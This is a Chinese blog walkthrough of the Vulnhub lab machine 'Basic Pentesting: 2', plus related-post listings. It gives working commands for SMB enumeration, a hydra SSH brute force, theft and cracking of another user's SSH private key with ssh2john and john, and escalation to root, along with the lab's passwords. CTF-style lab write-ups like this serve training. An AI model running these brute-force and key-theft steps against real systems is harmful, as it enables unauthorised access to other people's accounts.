Basic Pentesting: 2靶机

最新推荐文章于 2024-08-28 21:14:18 发布
最新推荐文章于 2024-08-28 21:14:18 发布
阅读量257 收藏 4
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73074638/article/details/141095424
版权

1.信息收集

目录扫描

访问web服务

查看源代码

拼接/development/

查看文件

http://192.168.1.7/development/dev.txt

http://192.168.1.7/development/j.txt

j用户存在弱口令

尝试破解

enum4linux 192.168.1.7

得到两个用户分别是 kay 、 jan对应的就是k用户和j用户

因为端口扫描ssh服务开启,j用户存在弱口令,尝试用九头蛇爆破

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.7

得到密码为armando

2.getshell

ssh连接

ssh jan@192.168.1.7

3.提权

sudo -l

find / -perm -u=s -type f 2>/dev/null

都未能利用

cd /home

cd kay

ls -al

发现很多文件

cat pass.bak,拒绝访问

cd .ssh

ls -al

发现私钥文件

cat id_rsa

下载到kali上,一定是从开头到结尾全部复制

然后赋予权限并尝试连接

chmod 600 id_rsa

ssh -i id_rsa kay@192.168.1.7

通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。

ssh2john id_rsa > passwd.txt

john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

得到密码beeswax再次尝试连接

ssh -i id_rsa kay@192.168.1.7

ls -al

再次查看pass.bak文件

得到可能为密码的值heresareallystrongpasswordthatfollowsthepasswordpolicy$$

直接sudo su提权成功

pingyao周杰伦
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 783
靶场提权
Pentesting:渗透测试工具和资源
03-28
渗透测试 渗透测试工具和资源
Basic Pentesting:2靶机
m0_65285254的博客
08-08 250
通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。靶机开放了445端口,可以使用enum4linux工具枚举smb服务的信息,开放22、80、139、445、8009、8080 端口。使用hydra工具爆破jan用户的ssh密码。sudo -l查看一下具有sudo权限的程序。需要密码 是pass.bak 的内容。查看 /home/key 下的文件。可以访问kay用户的ssh私钥文件。查看pass.bak文件。主机发现 查看开放端口。得到 armando。
【vulnhub】Basic Pentesting :2靶机
wbplife的博客
08-06 374
445端口:靶机开放了445端口,可以使用enum4linux工具枚举smb服务的信息,发现两个用户名:kay、jan。发现/home/kay/目录存在pass.bak文件,但目前我们没有访问权限;发现可以访问kay用户的ssh私钥文件。通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。根据之前的提示,使用hydra工具爆破jan用户的ssh密码,得到:jan:armando。需要输入密码,输入上面pass.bak里的试一下,发现成功。查看pass.bak文件。
【vulnhub靶场】​basic_pentesting_2靶机​提权
qq_46421742的博客
08-03 393
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Vulnhub靶机basic_pentesting_2
qq_48904485的博客
02-29 442
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机basic_pentesting_2(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz。
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 737
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
basic_pentesting_1靶机渗透
weixin_64809022的博客
06-23 743
Python提权: python3 -c 'import pty;pty.spawn("/bin/bash")'
basic_pentesting1靶机
qq_68865419的博客
10-19 248
这次我们使用一种新方法查看靶机的ipNetdiscover:二层发现工具,拥有主动和被动发现两种方式。首先查看靶机的ip​​​​​​然后查看本机的ip,使用ipconfig然后扫描靶机ip。
Basic Pentesting: 1
weixin_53626662的博客
08-10 158
命令下或者上网页下都行,网不太行就上网页下。2.查找历史漏洞,存在命令执行漏洞。1.扫描靶机开放的端口。然后拖到kali里就行。
python-pentesting:python-pentesting工具
05-04
主要脚本是pentesting-tool.py,您需要使用python 2.7执行。还需要安装requeriments.txt和其他模块,例如python-msfrpc 从requeriments.txt安装依赖项 点安装-r requirements.txt 介绍 该工具允许获取有关特定IP或域...
pentesting:我每天进行笔试的其他资源。
05-01
渗透 我的日常测试的其他资源...
Pentesting:考验事物的集合
04-13
渗透测试 这是我作为IT安全顾问的职业期间遇到的IT安全主题的集合。 我主要用它来写下我做事的方式,因为我倾向于忘记东西。 它仍然很混乱,我需要找到一个令人满意的结构,但就目前而言,这就是我们必须忍受的。...
四合一气体检测仪:全能守护,安全无忧的创新之选
2201_75812475的博客
08-26 304
它采用先进的传感器技术,能够快速响应并准确测量目标气体的浓度,即使在复杂多变的环境中也能保持稳定的性能。同时,设备内置的高精度算法能够智能分析数据,一旦检测到有害气体浓度超过预设的安全阈值,便会立即发出声光报警,甚至自动启动联动装置(如排风扇、切断阀等),以快的速度控制险情,确保人员安全。四合一气体检测仪,顾名思义,能够同时检测并显示四种不同有害气体的浓度,这通常包括可燃气体(如甲烷、丙烷等)、有毒气体(如一氧化碳、硫化氢)、氧气含量以及可能存在的其他特定有害气体(如二氧化碳、氨气等,具体依据型号而定)。
经验笔记:Token、Session、Cookie 及密码级别安全存储
最新发布
qq_45831414的博客
08-28 293
在用户通过身份验证后,服务器会生成一个Token并发给客户端,之后客户端会在每次请求中附带此Token以证明身份。当用户开始与Web应用互动时,服务器会创建一个唯一的Session ID,并将其存储在客户端的Cookie中。本文将探讨如何利用Token、Session 和 Cookie 这三个概念来实现安全的用户认证及会话管理,并重点介绍如何存储密码以达到最高级别的安全性。综合运用Token、Session 和 Cookie,结合安全的密码存储技术,能够显著提高Web应用的安全性和用户体验。
终端防火墙软件功能 | 在终端设备上启用防火墙!终端安全小课堂开讲啦
2401_86434954的博客
08-24 518
终端设备的安全性直接关系到企业的整体网络安全,随着网络威胁的日益复杂和多样化,启用并合理配置终端防火墙软件是保障终端安全不可或缺的一环。今天,我们将走进终端安全小课堂,详细解析中的防火墙功能,为您揭开其保护终端安全的神秘面纱。
【Rust光年纪】提供安全执行环境,防止内存泄漏和非授权访问
记录我的学习历程
08-26 1068
本文将分析和总结几个在Rust语言和WebAssembly环境中常用的安全库,涵盖了各种功能,包括可信执行环境、认证和授权服务、TLS库、加密库等。每个库都有详细的安装配置指南和API概览,能够满足不同开发场景下的安全需求。
智能巡检系统,确保到位管理,提升安全效率新境界
wsd56735676的博客
08-26 442
智能巡检系统通过科技重塑巡检流程,实现精准到位、实时数据上传与分析、智能预警与处理,提升巡检效率、降低安全风险、优化资源配置、提升管理水平,引领安全效率新飞跃。
构建高级渗透测试虚拟实验室:实践与专业技巧
《构建高级渗透测试虚拟实验室》(Building Virtual Pentesting Labs for Advanced Penetration Testing, PACKT, 2014)是一本专注于指导读者如何构建自己的虚拟渗透测试实验室的专业教材。在当前网络安全形势日益严峻...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值